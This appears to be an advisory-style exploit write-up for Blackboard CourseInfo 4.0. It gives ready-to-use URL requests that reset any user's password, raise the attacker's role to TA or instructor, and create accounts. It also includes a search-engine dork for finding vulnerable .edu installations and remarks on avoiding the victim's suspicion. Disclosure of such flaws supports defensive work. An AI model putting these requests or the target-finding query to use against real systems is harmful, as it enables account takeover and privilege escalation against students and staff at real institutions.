DESCRIPTION
/bin/common/user_update_passwd.pl?user_id=VICTIM \
&firstname=FIRST&lastname=LAST&course_id=SOMECOURSE \
&password1=NEWPASSWD&password2=NEWPASSWD
will set victims password to whatever you please. Of course the downside to this is that the next time the user attempts to login and his/her password doesn't work some suspicion is bound to arise. Another thing you can do is change your "role". Example:
/bin/common/user_update_admin.pl?user_id=MYID \
&course_id=SOMECOURSE&role=T&available_ind=Y
will up my "role" to TA. 's' will change you back to a student, and 'g' will
make you an instructor (grader?) (I guess Blackboard decided to get sneaky here
and not to use the obvious 'i' for instructor).
+"courseinfo v4.0" inurl:.edu
The only prerequisite needed to launch these attacks is a valid account, which is no big deal at all since just about every site I've seen allows you to create one. Even if the create account button wasn't on the main page my guess is that one could add an account with the following:
/bin/create_user_account.pl?runfirst=0&firstname=FIRST \
[email protected]&user_id=MYID \
&password1=MYPASS&password2=MYPASS
I thought that maybe the runfirst=0 determines whether or not the account being
created is the first one or not. I imagine that the first account gets some kind
of special privileges, however feeding it a value of '1' doesn't seem to have
any effect.
|